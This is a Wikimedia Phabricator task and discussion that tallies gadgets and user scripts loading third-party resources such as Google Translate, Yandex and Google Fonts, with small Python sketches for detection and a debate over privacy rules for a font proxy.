
Get stats on Gadgets and Users scripts loading third-party resources
Open, In Progress, Medium, Public

Description

Rationale

As part of the ongoing work on T296847, there is a need to understand how many Gadgets and User scripts would be impacted by the policy. This data will inform further discussions, especially during the upcoming policy consultation.

Initial findings

Methodology

Overall, the data collection combines several methods: Logstash queries, global-search.toolforge.org, and a script that builds a list of gadgets loading non-production resources. In addition, the exploration below draws on a raw list of reported CSP violations obtained from a Logstash query, covering reports from February to April 2023. The number of Gadgets and User scripts involved in those CSP violations was found by (a) trimming the URLs to obtain the list of domains involved in CSP violations, and (b) finding the occurrences of those domains across the Gadgets and User namespaces of all Wikimedia projects using https://global-search.toolforge.org and/or mwgrep, discarding noise such as "eval" and "data" results.
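Step (a) can be sketched roughly as follows. This is only an illustration, assuming the Logstash export yields one `blocked-uri` value per report; the noise keywords and the function names are hypothetical, not taken from the actual query or script.

```python
from collections import Counter
from urllib.parse import urlsplit

# Assumption: keyword or scheme-only values that carry no domain are noise.
NOISE = {"eval", "data", "inline", "blob", "self"}

def blocked_domain(blocked_uri):
    """Return the host part of a blocked-uri value, or None for noise."""
    value = blocked_uri.strip().lower()
    if not value or value.split(":", 1)[0] in NOISE:
        return None
    # Reports may contain a bare host; urlsplit needs a leading "//" for those.
    parts = urlsplit(value if "://" in value else "//" + value)
    return parts.hostname

def top_domains(blocked_uris, limit=50):
    """Count violations per domain and return the most frequent ones."""
    counts = Counter(d for d in map(blocked_domain, blocked_uris) if d)
    return counts.most_common(limit)
```

The resulting domain list is what would then be fed into global-search or mwgrep for step (b).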

List of gadgets loading third-party resources across all projects
TBD

Top domains violating CSP restrictions
When grouped by domain origins, URLs that violate CSP rules the most seem to originate from around 50 domains.

Observations on Gadgets loading third-party resources

Generally speaking, translation tools and WMCS-hosted applications seem to be among the top domains involved in CSP violations. Around 90 gadgets appear to load resources from Wikimedia Cloud Services, while around 80 use resources originating from non-WMCS resources, including Google Translate and Yandex APIs.

| # | Wiki | Gadget | Domain |
| --- | --- | --- | --- |
| 1 | az.wikipedia | MediaViki:SidebarTranslate.js | translate.google.com |
| 2 | be.wikipedia | MediaWiki:Gadget-GoogleTrans.js | translate.google.com |
| 3 | bjn.wikipedia | MediaWiki:Gadget-GoogleTrans.js | translate.google.com |
| 4 | ckb.wikipedia | میدیاویکی:Gadget-GoogleTrans.js | translate.google.com |
| 5 | ckb.wikipedia | میدیاویکی:Gadget-LinkTranslator.js | translate.google.com |
| 6 | fa.wikiquote | مدیاویکی:Gadget-googletranslator.js | translate.google.com |
| 7 | fa.wikisource | مدیاویکی:GoogleTranslator.js | translate.google.com |
| 8 | fa.wiktionary | مدیاویکی:Gadget-googletranslator.js | translate.google.com |
| 9 | gom.wikipedia | मिडियाविकी:Gadget-SidebarTranslate.js | translate.google.com |
| 10 | hy.wikipedia | MediaWiki:Gadget-ArticleTranslator.js | translate.google.com |
| 11 | mk.wikisource | МедијаВики:Gadget-GoogleTrans.js | translate.google.com |
| 12 | ml.wikipedia | മീഡിയവിക്കി:Gadget-GoogleTrans.js | translate.google.com |
| 13 | no.wikipedia | MediaWiki:Interwiki-links.js | translate.google.com |
| 14 | pnb.wikipedia | میڈیا وکی:Gadget-SidebarTranslate.js | translate.google.com |
| 15 | ps.wikipedia | ميډياويکي:Gadget-SidebarTranslate.js | translate.google.com |
| 16 | shn.wikipedia | မီႇတီႇယႃႇဝီႇၶီႇ:Gadget-SidebarTranslate.js | translate.google.com |
| 17 | so.wikipedia | MediaWiki:Gadget-GoogleTrans.js | translate.google.com |
| 18 | ur.wikipedia | میڈیاویکی:Editnotice-4-ویکی منصوبہ تخلیق مضامین شہر-درخواست تخلیق | translate.google.com |
| 19 | ur.wikipedia | میڈیاویکی:Gadget-SidebarTranslate.js | translate.google.com |
| 20 | zh.wikipedia | MediaWiki:Gadget-fixlinkstyle.js | translate.google.com |
| 21 | zh.wikivoyage | MediaWiki:Gadget-fixlinkstyle.js | translate.google.com |
| 22 | vi.wikipedia | MediaWiki:Gadget-SidebarTranslate.js | translate.google.com |
| 23 | ar.wikipedia | ميدياويكي:Gadget-LinkTranslator.js | translate.google.com |
| 24 | en.wikipedia | MediaWiki:Gadget-SidebarTranslate.js | translate.google.com |
| 25 | ban.wikipedia | MédiaWiki:Gadget-citations.js | tools.wmflabs.org |
| 26 | ca.wikipedia | MediaWiki:Gadget-scribe.js | tools.wmflabs.org |
| 27 | es.wikivoyage | MediaWiki:Kartographer.js | tools.wmflabs.org |
| 28 | fi.wikivoyage | Järjestelmäviesti:Kartographer.js | tools.wmflabs.org |
| 29 | fr.wikivoyage | MediaWiki:Kartographer.js | tools.wmflabs.org |
| 30 | gom.wikipedia | मिडियाविकी:Gadget-citations.js | tools.wmflabs.org |
| 31 | he.wikivoyage | מדיה ויקי:Kartographer.js | tools.wmflabs.org |
| 32 | ja.wikivoyage | MediaWiki:Kartographer.js | tools.wmflabs.org |
| 33 | ms.wikipedia | MediaWiki:Gadget-citations.js | tools.wmflabs.org |
| 34 | ru.wikivoyage | MediaWiki:Kartographer.js | tools.wmflabs.org |
| 35 | test2.wikipedia | MediaWiki:Kartographer.js | tools.wmflabs.org |
| 36 | test.wikipedia | MediaWiki:Gadget-citations.js | tools.wmflabs.org |
| 37 | test.wikipedia | MediaWiki:Gadget-scribe.js | tools.wmflabs.org |
| 38 | test.wikipedia | MediaWiki:Gadget-scribe-v2.js | tools.wmflabs.org |
| 39 | ur.wikipedia | میڈیاویکی:Gadget-citations.js | tools.wmflabs.org |
| 40 | vec.wikipedia | MediaWiki:Gadget-scribe.js | tools.wmflabs.org |
| 41 | yo.wikipedia | MediaWiki:Gadget-citations.js | tools.wmflabs.org |
| 42 | zh.wikivoyage | MediaWiki:Kartographer.js | tools.wmflabs.org |
| 43 | sv.wikipedia | MediaWiki:Kartographer.js | tools.wmflabs.org |
| 44 | ar.wikipedia | ميدياويكي:Gadget-scribe.js | tools.wmflabs.org |
| 45 | de.wikivoyage | MediaWiki:ListingEditor-es.js | wikivoyage.toolforge.org |
| 46 | de.wikivoyage | MediaWiki:Gadget-ListingEditor.js | wikivoyage.toolforge.org |
| 47 | de.wikivoyage | MediaWiki:Kartographer.js | wikivoyage.toolforge.org |
| 48 | de.wikivoyage | MediaWiki:Gadget-MapTools.js | wikivoyage.toolforge.org |
| 49 | en.wikivoyage | MediaWiki:Gadget-ListingEditor2.js | wikivoyage.toolforge.org |
| 50 | en.wikivoyage | MediaWiki:Gadget-ListingEditor.js | wikivoyage.toolforge.org |
| 51 | en.wikivoyage | MediaWiki:Kartographer.js | wikivoyage.toolforge.org |
| 52 | es.wikivoyage | MediaWiki:ListingEditor.js | wikivoyage.toolforge.org |
| 53 | it.wikivoyage | MediaWiki:Gadget-MapFrame.js | wikivoyage.toolforge.org |
| 54 | it.wikivoyage | MediaWiki:Gadget-ListingEditor.js | wikivoyage.toolforge.org |
| 55 | it.wikivoyage | MediaWiki:Gadget-ListingEditorBeta.js | wikivoyage.toolforge.org |
| 56 | it.wikivoyage | MediaWiki:Kartographer.js | wikivoyage.toolforge.org |
| 57 | ja.wikivoyage | MediaWiki:Kartographer.js | wikivoyage.toolforge.org |
| 58 | ja.wikivoyage | MediaWiki:Gadget-ListingEditor.js | wikivoyage.toolforge.org |
| 59 | ru.wikivoyage | MediaWiki:MapFrame.js | wikivoyage.toolforge.org |
| 60 | ru.wikivoyage | MediaWiki:Gadget-ListingEditor.js | wikivoyage.toolforge.org |
| 61 | shn.wikivoyage | မီႇတီႇယႃႇဝီႇၶီႇ:Gadget-ListingEditor.js | wikivoyage.toolforge.org |
| 62 | shn.wikivoyage | မီႇတီႇယႃႇဝီႇၶီႇ:Gadget-ListingEditor2.js | wikivoyage.toolforge.org |
| 63 | shn.wikivoyage | မီႇတီႇယႃႇဝီႇၶီႇ:Kartographer.js | wikivoyage.toolforge.org |
| 64 | fi.wikipedia | Järjestelmäviesti:Gadget-socialMedia.js | connect.facebook.net |
| 65 | af.wiktionary | MediaWiki:Gadget-RegexMenuFramework.js | tools-static.wmflabs.org |
| 66 | bn.wikisource | মিডিয়াউইকি:Gadget-RegexMenuFramework.js | tools-static.wmflabs.org |
| 67 | bn.wiktionary | মিডিয়াউইকি:Gadget-RegexMenuFramework.js | tools-static.wmflabs.org |
| 68 | ca.wikisource | MediaWiki:Gadget-TemplateScript.js | tools-static.wmflabs.org |
| 69 | el.wikisource | MediaWiki:Gadget-RegexMenuFramework.js | tools-static.wmflabs.org |
| 70 | en.wikisource | MediaWiki:TemplateScript/proofreading.js | tools-static.wmflabs.org |
| 71 | en.wikisource | MediaWiki:TemplateScript/typography.js | tools-static.wmflabs.org |
| 72 | en.wikisource | MediaWiki:Gadget-RegexMenuFramework-Cleanup.js | tools-static.wmflabs.org |
| 73 | en.wikisource | MediaWiki:Gadget-RegexMenuFramework.js | tools-static.wmflabs.org |
| 74 | en.wiktionary | MediaWiki:Gadget-RegexMenuFramework.js | tools-static.wmflabs.org |
| 75 | es.wikibooks | MediaWiki:Gadget-AjaxSysop.js | tools-static.wmflabs.org |
| 76 | gag.wikipedia | MediaWiki:Gadget-RegexMenuFramework.js | tools-static.wmflabs.org |
| 77 | hi.wikipedia | मीडियाविकि:Gadget-RegexMenuFramework.js | tools-static.wmflabs.org |
| 78 | hi.wikibooks | मीडियाविकि:Gadget-RegexMenuFramework.js | tools-static.wmflabs.org |
| 79 | hi.wikisource | मीडियाविकि:Gadget-RegexMenuFramework.js | tools-static.wmflabs.org |
| 80 | id.wiktionary | MediaWiki:Gadget-RegexMenuFramework.js | tools-static.wmflabs.org |
| 81 | kn.wikisource | ಮೀಡಿಯವಿಕಿ:Gadget-RegexMenuFramework.js | tools-static.wmflabs.org |
| 82 | kn.wikisource | ಮೀಡಿಯವಿಕಿ:Gadget-RegexMenuFramework-Cleanup.js | tools-static.wmflabs.org |
| 83 | wikitech.wikimedia | MediaWiki:Gadget-mobileVector.js | tools-static.wmflabs.org |
| 84 | mediawiki | MediaWiki:Gadget-mobileVector.js | tools-static.wmflabs.org |
| 85 | mr.wikisource | मिडियाविकी:TemplateScript/typography.js | tools-static.wmflabs.org |
| 86 | mr.wikisource | मिडियाविकी:TemplateScript/proofreading.js | tools-static.wmflabs.org |
| 87 | or.wiktionary | ମିଡ଼ିଆଉଇକି:Gadget-RegexMenuFramework.js | tools-static.wmflabs.org |
| 88 | pa.wikipedia | ਮੀਡੀਆਵਿਕੀ:Gadget-cleanup.js | tools-static.wmflabs.org |
| 89 | pa.wikisource | ਮੀਡੀਆਵਿਕੀ:Gadget-Blockcenter.js | tools-static.wmflabs.org |
| 90 | pa.wikisource | ਮੀਡੀਆਵਿਕੀ:Gadget-RegexMenuFramework.js | tools-static.wmflabs.org |
| 91 | pa.wikisource | ਮੀਡੀਆਵਿਕੀ:Gadget-Cleanup.js | tools-static.wmflabs.org |
| 92 | pa.wikisource | ਮੀਡੀਆਵਿਕੀ:Gadget-pathoschild.templatescript.js | tools-static.wmflabs.org |
| 93 | pt.wikibooks | MediaWiki:Gadget-Informação adicional.js | tools-static.wmflabs.org |
| 94 | ru.wikisource | MediaWiki:Gadget-convenientDiscussions.js | tools-static.wmflabs.org |
| 95 | shn.wiktionary | မီႇတီႇယႃႇဝီႇၶီႇ:Gadget-RegexMenuFramework.js | tools-static.wmflabs.org |
| 96 | sr.wikipedia | Медијавики:Gadget-Poruke.js | tools-static.wmflabs.org |
| 97 | ta.wikiquote | மீடியாவிக்கி:Gadget-Ajax sysop.js | tools-static.wmflabs.org |
| 98 | ta.wiktionary | மீடியாவிக்கி:Gadget-RegexMenuFramework.js | tools-static.wmflabs.org |
| 99 | test2.wikipedia | MediaWiki:Gadget-MobileTW.js | tools-static.wmflabs.org |
| 100 | te.wikisource | మీడియావికీ:Gadget-RegexMenuFramework.js | tools-static.wmflabs.org |
| 101 | te.wikisource | మీడియావికీ:Gadget-RegexMenuFramework-Cleanup.js | tools-static.wmflabs.org |
| 102 | vi.wikisource | MediaWiki:TemplateScript/proofreading.js | tools-static.wmflabs.org |
| 103 | vi.wikisource | MediaWiki:TemplateScript/typography.js | tools-static.wmflabs.org |
| 104 | zh.wikipedia | MediaWiki:Gadget-webfont.js | tools-static.wmflabs.org |
| 105 | es.wikipedia | MediaWiki:Gadget-TemplateScript.js | tools-static.wmflabs.org |
| 106 | commons.wikimedia | MediaWiki:Gadget-TabularImportExport.js | tools-static.wmflabs.org |
| 107 | test.wikipedia | MediaWiki:Gadget-wikilabels.js | labels.wmflabs.org |
| 108 | test.wikipedia | MediaWiki:Gadget-wikilabels-loader.js | labels.wmflabs.org |
| 109 | meta.wikimedia | MediaWiki:Gadget-WikiLabels-loader.js | labels.wmflabs.org |
| 110 | be-tarask.wikipedia | MediaWiki:Common.js/coordinates.js | yandex.ru |
| 111 | ce.wikipedia | MediaWiki:Googlesearch | yandex.ru |
| 112 | ce.wikipedia | MediaWiki:ExtSearchPanel.js | yandex.ru |
| 113 | ce.wikipedia | MediaWiki:Gadget-common-special-search.js | yandex.ru |
| 114 | ka.wikipedia | მედიავიკი:Search.js | yandex.ru |
| 115 | ky.wikipedia | МедиаВики:Search.js | yandex.ru |
| 116 | lez.wikipedia | MediaWiki:Search.js | yandex.ru |
| 117 | myv.wikipedia | MediaWiki:Common.js | yandex.ru |
| 118 | ru.wikipedia | MediaWiki:Gadget-yandex-speechrecognition.js | yandex.ru |
| 119 | ru.wikisource | MediaWiki:Common.js | yandex.ru |
| 120 | test.wikipedia | MediaWiki:Gadget-ruwiki-common-special-search.js | yandex.ru |
| 121 | tg.wikipedia | Медиавики:Gadget-common-special-search.js | yandex.ru |
| 122 | tg.wikipedia | Медиавики:Gadget-yandex-speechrecognition.js | yandex.ru |
| 123 | tg.wikipedia | Медиавики:Search.js | yandex.ru |
| 124 | tg.wikipedia | Медиавики:Gadget-yandex-tts.js | yandex.ru |
| 125 | tt.wikibooks | МедиаВики:Search.js | yandex.ru |
| 126 | ru.wikipedia | MediaWiki:Powersearchtext | yandex.ru |
| 127 | uk.wikipedia | MediaWiki:Gadget-SpeedyDeletion.js | yandex.ru |
| 128 | meta.wikimedia | MediaWiki:Gadget-common-special-search.js | yandex.ru |
| 129 | ru.wikipedia | MediaWiki:Googlesearch | yandex.ru |
| 130 | ru.wikipedia | MediaWiki:ExtSearchPanel.js | yandex.ru |
| 131 | ru.wikipedia | MediaWiki:Gadget-yandex-tts.js | yandex.ru |
| 132 | ru.wikipedia | MediaWiki:Gadget-common-special-search.js | yandex.ru |
| 133 | ar.wikipedia | ميدياويكي:Gadget-Timeless-Dark.css | fonts.googleapis.com |
| 134 | bn.wikibooks | মিডিয়াউইকি:Common.css/Typo.css | fonts.googleapis.com |
| 135 | pnb.wikipedia | میڈیا وکی:Gadget-NotoNastaleeqMobile.css | fonts.googleapis.com |
| 136 | ur.wikipedia | میڈیاویکی:Gadget-NotoNastaleeqMobile.css | fonts.googleapis.com |
| 137 | zh.wikipedia | MediaWiki:Gadget-webfontloader.js | fonts.googleapis.com |
| 138 | meta.wikimedia | MediaWiki:Centralnotice-template-trilogy dsk p1 lg monthly pitch1 extFont | fonts.googleapis.com |
| 139 | bn.wikibooks | মিডিয়াউইকি:Common.css/Typo.css | cdn.rawgit.com |
| 140 | fa.wikipedia | مدیاویکی:LoadTopRevisionsByRevertScore.js | cdn.rawgit.com |
| 141 | ar.wikipedia | ميدياويكي:Gadget-QuickEdit.js | zh.moegirl.org |
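
The WMCS versus non-WMCS split mentioned in the observations could be tallied from rows like the ones in the table with something like the sketch below. The suffix list is an assumption about which domains count as Wikimedia Cloud Services, and the function names are hypothetical.

```python
# Assumption: domains under these suffixes are hosted on Wikimedia Cloud Services.
WMCS_SUFFIXES = ("wmflabs.org", "toolforge.org", "wmcloud.org")

def is_wmcs(domain):
    """True if the domain is one of the WMCS suffixes or a subdomain of one."""
    d = domain.lower().rstrip(".")
    return any(d == s or d.endswith("." + s) for s in WMCS_SUFFIXES)

def split_counts(rows):
    """rows: iterable of (wiki, page, domain) tuples. Returns per-group totals."""
    totals = {"wmcs": 0, "other": 0}
    for _wiki, _page, domain in rows:
        totals["wmcs" if is_wmcs(domain) else "other"] += 1
    return totals
```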

Observations on User scripts loading third-party resources (in progress)

Most User scripts related to CSP violations load non-WMCS resources, including Facebook Connect and Google Analytics. It is also good to note that Google fonts are among the most loaded external resources.

Event Timeline

Restricted Application added subscribers: Reception123, Stang, Aklapper.

Can the stats table be split by userscripts and gadgets? The latter certainly have far more exposure, esp when counting userscripts of defunct users in the user table.

> Can the stats table be split by userscripts and gadgets? The latter certainly have far more exposure, esp when counting userscripts of defunct users in the user table.

I plan to put the data regarding user scripts in a separate section (see the very bottom of the description)

User scripts loading third-party resources
TBD

@Xaosflux, is that what you were asking for? Or did you suggest that the User script stats be put in the same stats table, under separate columns?

Either a separate column, or a separate table is fine; I think there may be some exceptions to add as well, for example the page https://meta.wikimedia.org/wiki/MediaWiki:Gadget-common-special-search.js is on the list above, pointing to a yandex.ru link, however it isn't actually importing that, that is inside a comment - not sure how much effort would be needed or what the expected benefit of excluding comments would be

sguebo_WMF changed the task status from Open to In Progress. May 4 2023, 10:31 AM
sguebo_WMF triaged this task as Medium priority.
sguebo_WMF updated the task description.

> Either a separate column, or a separate table is fine; I think there may be some exceptions to add as well, for example the page https://meta.wikimedia.org/wiki/MediaWiki:Gadget-common-special-search.js is on the list above, pointing to a yandex.ru link, however it isn't actually importing that, that is inside a comment - not sure how much effort would be needed or what the expected benefit of excluding comments would be

A separate table makes sense to me as well. I've adjusted the description accordingly. I agree that in some cases comments create some noise in the total count. I haven't figured out a much cleaner way to discard comments yet since I am using data from global-search.toolforge.org. For now I am considering tweaking a copy of mwgrep to filter out comments and other patterns of noise, but I am open to suggestions.
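
One way to discard comments before searching for a domain is sketched below. It is not how mwgrep or global-search work; it is a small hand-rolled scanner that only understands string literals and the two JavaScript comment forms. Regex literals and template-string interpolation are not handled, so it can still be fooled.

```python
def strip_js_comments(source):
    """Remove // and /* */ comments while leaving string literals untouched."""
    out = []
    i, n = 0, len(source)
    quote = None  # delimiter of the string literal we are inside, if any
    while i < n:
        ch = source[i]
        nxt = source[i + 1] if i + 1 < n else ""
        if quote:
            out.append(ch)
            if ch == "\\" and nxt:
                # Keep the escaped character so an escaped quote does not end the string.
                out.append(nxt)
                i += 2
                continue
            if ch == quote:
                quote = None
            i += 1
        elif ch in "\"'`":
            quote = ch
            out.append(ch)
            i += 1
        elif ch == "/" and nxt == "/":
            # Line comment: skip up to (not including) the newline.
            while i < n and source[i] != "\n":
                i += 1
        elif ch == "/" and nxt == "*":
            # Block comment: skip past the closing */ (or to the end if unterminated).
            end = source.find("*/", i + 2)
            i = n if end == -1 else end + 2
        else:
            out.append(ch)
            i += 1
    return "".join(out)
```

Searching the stripped text for `yandex.ru` would then skip pages where the domain only appears inside a comment, while a URL inside a string literal (where `//` is not a comment) is kept.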

In T335892, @sguebo_WMF wrote:

> It is also good to note that Google fonts are among the most loaded external resources.

Yes, one important learning here is that webfont support is strongly desired, sometimes surely for mere "fun" reasons ("I think it looks prettier"), but also for substantial reasons. e.g. T166138

This desire was why a "webfont" component was created (way back in the mists of time), but due to changing priorities it morphed into an i18n system (ULS), and staffing and mandate do not allow that team to actually address webfont-related issues.

The alternative was the GFont proxy hosted on WMCS (by a volunteer who has signed the NDA), but that's nixed by the Privacy Policy, which due to some technical-legal brainfart treats the HTTP User-Agent header as directly equivalent to your social security number and bank account number. GFonts needs that header to send you the right font file (i.e. the standard protocol content negotiation), so it cannot work without it, but everything else is stripped from the request.

The stats gathered above show: 1) that there is a genuine unmet need for webfonts, and 2) work on the Privacy Policy and a Third-Party Resources policy should have enabling this use case as a primary concern (within necessary strictures).

We need some way to, safely, enable a small number of webfonts by default on a project (including for non-logged in users). Locked down to interface admins, or even needing a site-request like other config, with explicit whitelisting of each font, run through an anonymizing proxy that puts User-Agent headers into buckets, etc. as necessary; but some way to support the use case.
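
To make the "buckets" idea concrete, here is a rough sketch of how a proxy might reduce a User-Agent header to a coarse label before anything is sent upstream. The bucket names and matching rules are hypothetical, and whether a bucket of this coarseness would satisfy the Privacy Policy is not something this sketch can answer.

```python
def ua_bucket(user_agent):
    """Map a full User-Agent string to a coarse browser-family label."""
    ua = user_agent.lower()
    # Order matters: Edge UAs also contain "chrome/", and Chrome UAs contain "safari/".
    if "edg/" in ua:
        return "edge"
    if "firefox/" in ua:
        return "firefox"
    if "chrome/" in ua or "chromium/" in ua:
        return "chrome"
    if "safari/" in ua:
        return "safari"
    return "other"
```

Only the bucket label, not the original header, would then be used to pick which font format to request.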

It's orthogonal to this task, but the stats gathered here should inform secondary learnings like this, not least in terms of what the goals of the TPR process should be.

Toolforge does already have a google fonts proxy: https://fontcdn.toolforge.org/

We just need to convince people to use that instead.

> Toolforge does already have a google fonts proxy: https://fontcdn.toolforge.org/

> We just need to convince people to use that instead.

Toolforge is considered third-party (even if the maintainer has signed the NDA), and the Privacy Policy considers the User-Agent header to be PII that cannot be sent to Google even if everything else is stripped. See T166138. And, yes, I did check with WMF Legal. It’s currently Catch 22-impossible.

Either the Privacy Policy needs to permit a risk-assessment based softening for HTTP headers used for content negotiation, or the WMF (not volunteers) needs to implement a Google Fonts-alike in production (not Toolforge/WMCS). There are no other options open that I’ve been able to identify.

>> Toolforge does already have a google fonts proxy: https://fontcdn.toolforge.org/

>> We just need to convince people to use that instead.

> Toolforge is considered third-party (even if the maintainer has signed the NDA), and the Privacy Policy considers the User-Agent header to be PII that cannot be sent to Google even if everything else is stripped. See T166138. And, yes, I did check with WMF Legal. It’s currently Catch 22-impossible.

While it's not great, it's still much better to hit toolforge than hitting Google.

>>> Toolforge does already have a google fonts proxy: https://fontcdn.toolforge.org/

>> Toolforge is considered third-party (even if the maintainer has signed the NDA), and the Privacy Policy considers the User-Agent header to be PII that cannot be sent to Google even if everything else is stripped. See T166138. And, yes, I did check with WMF Legal. It’s currently Catch 22-impossible.

> While it's not great, it's still much better to hit toolforge than hitting Google.

I don't disagree. But the Privacy Policy does, and WMF Legal (and whoever they have for technical advice) does. And AIUI the third-party resources policy currently does treat WMCS as third-party (I may be wrong), meaning it requires opt-in consent, meaning we can't enable fonts from there by default.

See T209998 for a different example. Note that the alternatives proposed on that task require there to be some team at the WMF whose responsibility it is to add fonts. The only such team is the Language team. The Language team does not have the resources to fulfill such requests, and has been scoped down to only deal with i18n issues (i.e. the workarounds are outside their current scope so they can't spend time on it).

So… we can't have webfonts through volunteer tools (fontcdn) due to the Privacy Policy, and we can't have fonts installed in WMF production because it's outside every team's scope. In other words: Catch 22. It's tearing-my-hair-out level frustrating, but that's where we are.

I'm kinda derailing this task now (sorry), so my main point is that since we now have the stats above, and they point out fonts as among the main third-party resources people load, we should make sure we try to address that in some way (find a reasonable way to enable that use case without unreasonably raising the risk). It's currently bright-line prohibited, but the fontcdn solution has properties that reduce that risk to what I assert is an acceptable level. It's just not zero, which is what the current bright-line policy requires.

>> Toolforge does already have a google fonts proxy: https://fontcdn.toolforge.org/

>> We just need to convince people to use that instead.

> Toolforge is considered third-party (even if the maintainer has signed the NDA), and the Privacy Policy considers the User-Agent header to be PII that cannot be sent to Google even if everything else is stripped. See T166138. And, yes, I did check with WMF Legal.

Is there a phab task where you discussed this with WMF Legal? I wonder if WMF Legal might reconsider the User-Agent header as PII for Chrome browser at least, given Google-Chrome-User-Agent-Deprecation.

> Is there a phab task where you discussed this with WMF Legal?

It was email direct to privacy@ (tagged 36012 in their Zendesk, answered by Aeryn).

> my main point is that since we now have the stats above, and they point out fonts as among the main third-party resources people load, we should make sure we try to address that in some way (find a reasonable way to enable that use case without unreasonably raising the risk). It's currently bright-line prohibited, but the fontcdn solution has properties that reduce that risk to what I assert is an acceptable level. It's just not zero, which is what the current bright-line policy requires.

For the specific case of fontcdn, I'd like to note that the issue of sharing User Agent information with Google would still remain, as it was pointed out by others in the past (T166138#7228181). That being said, I agree with the need to explore "a reasonable way to enable that use case without unreasonably raising the risk" in light of the data above. Speaking of that, the conversation about the policy draft is now open with some initial questions, including whether WMCS-hosted resources (eg: fonts) should be treated as third-parties: https://meta.wikimedia.org/wiki/Talk:Third-party_resources_policy

Hope to hear your thoughts there!

>> Toolforge is considered third-party (even if the maintainer has signed the NDA), and the Privacy Policy considers the User-Agent header to be PII that cannot be sent to Google even if everything else is stripped. See T166138. And, yes, I did check with WMF Legal. It’s currently Catch 22-impossible.

> While it's not great, it's still much better to hit toolforge than hitting Google.

Apparently this toolforge tool still forwards user-agents to google, because the google fonts vary by user agent. I suggest we adapt that tool to simply override the user agent, as it is no longer required to vary on user-agent as all modern web browsers support woff and woff2.
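
The override could look roughly like the sketch below: the proxy forwards only an allowlist of client headers and always substitutes one fixed User-Agent. The fixed value and the allowlist are hypothetical, and which fixed value makes the upstream return woff2 would still need to be checked. Per a later comment in this thread, fontcdn is mostly proxy configuration, so this only illustrates the logic and is not its code.

```python
# Hypothetical fixed value; the real choice would need testing against the upstream.
FIXED_USER_AGENT = "fontproxy-sketch/0.1"
# Assumption: only content-negotiation headers with no user-specific detail pass through.
FORWARDED_HEADERS = {"accept", "accept-encoding"}

def upstream_headers(client_headers):
    """Build the header set sent upstream, dropping everything not allowlisted."""
    headers = {
        name: value
        for name, value in client_headers.items()
        if name.lower() in FORWARDED_HEADERS
    }
    headers["User-Agent"] = FIXED_USER_AGENT
    return headers
```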

> Apparently this toolforge tool still forwards user-agents to google, because the google fonts vary by user agent. I suggest we adapt that tool to simply override the user agent, as it is no longer required to vary on user-agent as all modern web browsers support woff and woff2.

Should that be a dedicated task (under Tools and Privacy) about fontcdn? As too often I have no idea where its source is located though...

Definitely would be pro-overriding the user-agent for fontcdn (and cdnjs) — that would make it significantly easier to argue that they should be considered ok to allowlist for third-party resources.

> […] As too often I have no idea where its source is located though...

AIUI it's mostly custom config on the proxies (by special arrangement), so there's no real code to speak of. But @zhuyifei1999 can presumably clarify.

> Definitely would be pro-overriding the user-agent for fontcdn (and cdnjs) - that would make it significantly easier to argue that they should be considered ok to allowlist for third-party resources.

It's logged above, but just for clarity: the cdnjs UA issue is in T210959.

To get the data on gadgets loading third-party resources much more quickly, I'm exploring a different approach that requires fewer steps. The idea is to have a script that can:

  1. Find all pages with the JavaScript content model in namespace 8 in the replicas
  2. Scan their content using the MediaWiki API to detect third parties
  3. Build a table associating wiki project, gadget, and third parties.

The detection of third-party resources is still funky and I'd need to fine-tune the script but the initial version of the script generates the markdown table below (the full table, with ~2800 entries, is available in F55305255#7434).

| Project | Gadget | Third-Party Domains |
| --- | --- | --- |
| ace.wikipedia.org | MediaWiki:Gadget-morebits.js | github.com, onehackoranother.com |
| ace.wikipedia.org | MediaWiki:Gadget-Twinkle.js | www.JSON.org, github.com |
| ace.wikipedia.org | MediaWiki:Gadget-MindMap.js | www.wikimindmap.org |
| ace.wikipedia.org | MediaWiki:Gadget-ArticleTraffic.js | stats.grok.se |
| af.wikipedia.org | MediaWiki:GeoHack.js | toolserver.org |
| af.wikipedia.org | MediaWiki:Common.js | opensource.org, www.google.com, www.bing.com, www.wikiwix.com |
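
Steps 2 and 3 of the approach described above might look something like the sketch below. It is not the script attached to this task: the page contents are assumed to have been fetched already, the first-party suffix list is an assumption, and every URL in the source is matched, including ones in comments or plain links, which is one source of the false positives discussed in this thread.

```python
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r"""https?://[^\s"'<>()\\]+""", re.IGNORECASE)
# Assumption: hosts under these suffixes count as first-party (production).
FIRST_PARTY = ("wikipedia.org", "wikimedia.org", "mediawiki.org", "wikidata.org")

def is_first_party(host):
    return any(host == s or host.endswith("." + s) for s in FIRST_PARTY)

def third_party_domains(content):
    """Return the sorted set of non-first-party hosts found in any URL."""
    hosts = set()
    for url in URL_RE.findall(content):
        try:
            host = urlsplit(url).hostname
        except ValueError:  # malformed URL, e.g. a broken IPv6 literal
            continue
        if host and not is_first_party(host):
            hosts.add(host)
    return sorted(hosts)

def build_table(pages):
    """pages: iterable of (project, title, content). Returns a markdown table."""
    lines = ["| Project | Gadget | Third-Party Domains |", "| --- | --- | --- |"]
    for project, title, content in pages:
        domains = third_party_domains(content)
        if domains:
            lines.append(f"| {project} | {title} | {', '.join(domains)} |")
    return "\n".join(lines)
```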

@sbassett, as a next step I'd probably use your idea of detecting TPR use by searching for things like import, importScript, mw.loader.load, xmlhttprequest, jquery.load, url for css, et al. Glad to hear if you think there's a cleaner way to avoid false positives.
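
A first pass at searching for loader calls could be a plain regular expression over each line, as in the sketch below. The sink list is a partial, assumed selection of the loading functions named above, and a textual match says nothing about whether the loaded URL is actually third-party.

```python
import re

# Assumption: a partial list of JS calls that can pull in external resources.
SINKS = [
    "importScriptURI", "importStylesheetURI", "importScript", "importStylesheet",
    "mw.loader.load", "mw.loader.getScript", "$.getScript", "XMLHttpRequest", "fetch",
]
# The lookarounds stop matches inside longer identifiers such as "prefetch".
SINK_RE = re.compile(
    r"(?<![\w$])(?:" + "|".join(re.escape(s) for s in SINKS) + r")(?![\w$])"
)

def find_sinks(source):
    """Return (line number, sink name) for every loader call found in the source."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for match in SINK_RE.finditer(line):
            hits.append((lineno, match.group(0)))
    return hits
```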

> The detection of third-party resources is still funky and I'd need to fine-tune the script but the initial version of the script generates the markdown table below.

I think you would have to do quite a lot of post-processing. All 6 of the entries in that table are false positives (the second-to-last entry is a bit debatable since the code would do a third-party load; however, as far as I can tell it is impossible to trigger said code as the file is never loaded, which makes sense as all those URLs are for toolserver, which is long dead. At the same time, maybe it's desired to know about such pages even if the code is never executed). Such an approach also has false negatives, such as ace:MediaWiki:Gadget-GoogleTrans.js, which does indeed load third-party resources (in fairness, the script would have to be quite complex to detect this example).

